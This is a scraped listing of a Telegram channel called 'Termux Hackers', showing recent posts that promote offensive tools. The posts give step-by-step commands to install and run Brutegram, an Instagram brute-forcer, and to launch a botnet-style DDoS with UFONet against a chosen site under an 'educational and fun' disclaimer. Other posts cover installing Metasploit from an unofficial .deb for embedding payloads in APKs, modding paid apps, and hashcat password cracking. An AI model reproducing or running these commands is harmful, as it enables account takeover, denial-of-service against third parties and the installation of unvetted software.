🔥 Burn Fat Fast. Discover How! 💪

Termux Hackers (Users)

Logo of telegram channel termux_for_android — Termux Hackers (Users) T
Logo of telegram channel termux_for_android — Termux Hackers (Users)
Channel address: @termux_for_android
Categories: Education
Language: English
Subscribers: 68.20K
Description from channel

╔╦╦╦═╦╗╔═╦═╦══╦═╗
║║║║╩╣╚╣═╣║║║║║╩╣
╚══╩═╩═╩═╩═╩╩╩╩═╝
Use This bot to contact with us
@Bot_Nospam_Bot
Check This bot @TermuxForAndroidBot

Ratings & Reviews

2.67

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

0

3 stars

0

2 stars

1

1 stars

1


The latest Messages 20

2022-05-13 15:07:46 For decompiling apk you will get a different application for Different Operating System but If you wanna decompile an application in termux you need to install ApkTool In termux. Apk Tool will allow you to compile applications in termux. You can also use nano to edit files in termux and you can also decompile in termux using ApkTool.

Its a good tool for all the people who are interested in making moded apps by using Apktool in Termux. Since making a mod of games is a Vast topic I am only gonna show you basics but if you really interested then you can always learn it from the internet.
694 views 𝙆ᴇʋɨռ , edited  12:07
Open / Comment
2022-05-13 15:07:19
What is ApkTool in Termux?

You have probably seen Moded apps (like moded Version of subways surfer) where you get 999999 coins from the start. Those games are created by People who Make Mod of games To make money ( Technically it is not Legal). So To make those Mods People use Apk Decompiler Tools that allow them to access individual part of application files, and then they make changes in the code (Like changing the initial starting money/points from 0 to 9999999) and after Recomiling the files into and APK they make and Moded App.
735 views 𝙆ᴇʋɨռ , edited  12:07
Open / Comment
2022-05-11 15:52:35
SCREENSHOT
3.1K views 𝙆ᴇʋɨռ , 12:52
Open / Comment
2022-05-11 15:51:16 Installation
apt update && apt upgrade

apt install python python2 git jq

pip2 install requests mechanize

git clone https://github.com/Err0r-ICA/Brutegram

cd Brutegram

bash Brutegram
3.1K views 𝙆ᴇʋɨռ , 12:51
Open / Comment
2022-05-11 15:50:24
Brutegram
Instagram Multi-Bruteforce ( currently under updating )
2.9K views 𝙆ᴇʋɨռ , 12:50
Open / Comment
2022-05-10 13:57:29 ​​HOW TO PERFORM DDOS ATTACK AS YOU'RE DOING IT VIA BOTNET

Do this only on Linux distr.:

apt update && apt upgrade
git clone https://github.com/epsylon/ufonet.git
cd ufonet
pip3 install GeoIP
pip3 install python-geoip
pip3 install pygeoip
pip3 install requests
pip3 install pycrypto
pip3 install pycurl
pip3 install whois
pip3 install scapy-python3
chmod + x setup.py
chmod + x ufonet
python3 ufonet --download-zombies
python3 ufonet -i sitehere

This is for educational and fun purposes only
4.1K views 𝙆ᴇʋɨռ , 10:57
Open / Comment
2022-05-06 23:08:46 PROBLEMS WITH METASPLOIT INSTALLATIONS

This metasploit use Ruby v3 and have available option "-x" to embed apk files

[METHOD 1]
apt install wget -y
wget https://raw.githubusercontent.com/ivam3/i-Haklab/master/.set/to-install/metasploit-framework_6.1.39_all.deb
apt install ./metasploit-framework_6.1.39_all.deb
rm metasploit-framework_6.1.39_all.deb

[METHOD 2]
Going to :
https://ivam3-termux-pkg.loca.lt/

And download file .deb and execute it by :

$ apt install ./name-of-file.deb

And deleted it
$ rm -rf name-of-file.deb

Credit : Unknown
7.3K views 𝙆ᴇʋɨռ , 20:08
Open / Comment
2022-04-30 23:15:04 https://t.me/Termux_Hacking_Commands
138 viewsκɛѵιи , 20:15
Open / Comment
2022-04-30 22:57:08 Installation

Download the latest release and unpack it in the desired location. Please remember to use 7z x when unpacking the archive from the command line to ensure full file paths remain intact.

Usage/Help

Please refer to the Hashcat Wiki and the output of --help for usage information and general help. A list of frequently asked questions may also be found here. The Hashcat Forum also contains a plethora of information.

Contributing

Contributions are welcome and encouraged, provided your code is of sufficient quality. Before submitting a pull request, please ensure your code adheres to the following requirements:

Licensed under MIT license, or dedicated to the public domain (BSD, GPL, etc. code is incompatible)

Adheres to gnu99 standard

Compiles cleanly with no warnings when compiled with -W -Wall -std=gnu99

Uses Allman-style code blocks & indentation

Uses 2-spaces as the indentation or a tab if it's required (for example: Makefiles)

Uses lower-case function and variable names

Avoids the use of ! and uses positive conditionals wherever possible (e.g., if (foo == 0) instead of if (!foo), and if (foo) instead of if (foo != 0))

Use code like array[index + 0] if you also need to do array[index + 1], to keep it aligned

You can use GNU Indent to help assist you with the style requirements:

indent -st -bad -bap -sc -bl -bli0 -ncdw -nce -cli0 -cbi0 -pcs -cs -npsl -bs -nbc -bls -blf -lp -i2 -ts2 -nut -l1024 -nbbo -fca -lc1024 -fc1

Your pull request should fully describe the functionality you are adding/removing or the problem you are solving. Regardless of whether your patch modifies one line or one thousand lines, you must describe what has prompted and/or motivated the change.
Solve only one problem in each pull request. If you're fixing a bug and adding a new feature, you need to make two separate pull requests. If you're fixing three bugs, you need to make three separate pull requests. If you're adding four new features, you need to make four separate pull requests. So on, and so forth.
If your patch fixes a bug, please be sure there is an issue open for the bug before submitting a pull request. If your patch aims to improve performance or optimize an algorithm, be sure to quantify your optimizations and document the trade-offs, and back up your claims with benchmarks and metrics.
In order to maintain the quality and integrity of the hashcat source tree, all pull requests must be reviewed and signed off by at least two board members before being merged. The project lead has the ultimate authority in deciding whether to accept or reject a pull request. Do not be discouraged if your pull request is rejected!

Happy Cracking!
252 viewsκɛѵιи , 19:57
Open / Comment
2022-04-30 22:56:16 hashcat

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking.
233 viewsκɛѵιи , 19:56
Open / Comment